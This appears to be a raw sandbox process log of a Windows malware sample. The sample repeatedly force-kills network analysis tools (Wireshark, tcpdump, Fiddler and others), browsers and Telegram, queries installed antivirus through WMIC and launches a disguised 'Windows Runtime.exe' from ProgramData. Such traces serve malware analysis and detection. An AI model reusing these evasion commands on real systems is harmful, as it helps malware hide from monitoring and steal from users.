C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\ProgramData\Windows Runtime.exe
"C:\ProgramData\Windows Runtime.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
